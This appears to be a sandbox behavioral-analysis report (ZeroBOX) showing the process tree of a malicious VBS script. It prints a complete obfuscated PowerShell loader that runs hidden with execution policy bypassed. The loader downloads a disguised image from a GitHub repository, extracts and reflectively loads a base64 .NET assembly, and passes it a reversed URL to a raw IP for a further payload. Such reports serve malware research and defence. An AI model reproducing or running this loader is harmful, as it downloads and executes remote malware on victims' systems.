ZeroBOX

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\nighttttMPDW-constraints.vbs

    PID: 316
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

      PID: 2136
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('yjLimageUrl = YqLhttps://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg YqL;yjLwebClient = New-Object System.Net.WebClie'+'nt;yjLimageB'+'ytes = yjLwebClient.DownloadData(yjLimageUrl);yjLimageText = [System.Text.Encoding]::UTF8.GetString(yjLimageBytes);yj'+'Lst'+'artFlag = YqL<<BASE64_START'+'>>YqL;yjLendFlag = YqL<<BASE64_END>>YqL;yjLstartIndex = yjLimageText.IndexOf(y'+'jLstartFlag);yjLendIndex = yjLimageText.IndexOf(yjLendFlag);yjLstartIndex -ge 0 -and yjLe'+'ndI'+'ndex -gt yjLstartIndex;yjLs'+'tartIndex += yjLstartFlag'+'.Length;yjLbase64Length = yjLendIndex - yjLstartIndex;yjLbase64Command = yjLimageText.Substring(yjLsta'+'rtIndex, yjLbase64Length'+');yjLcommandBytes = [System.Convert]::FromBase6'+'4String(yj'+'Lbas'+'e64Command);yjLloadedAssembly = [System.Reflection.Assembly]::Load(yjLco'+'mmandBytes);yjLvaiM'+'ethod = [dnlib.IO.Home].GetMethod(YqLVAIYqL);yjLvaiMethod.Invoke('+'yjLnull, '+'@(YqLtxt.44446esa'+'b'+'bbbbbewmadam/431.871.64.891//:ptthYqL, YqLdesativadoYqL, YqLdesativadoYqL, YqLdesativadoYqL, YqLAddInProcess32YqL, YqLdesativadoYqL, YqLdesativadoYqL));').RePlaCE('yjL','$').RePlaCE('YqL',[stRING][ChAr]39) | iex"

        PID: 2276
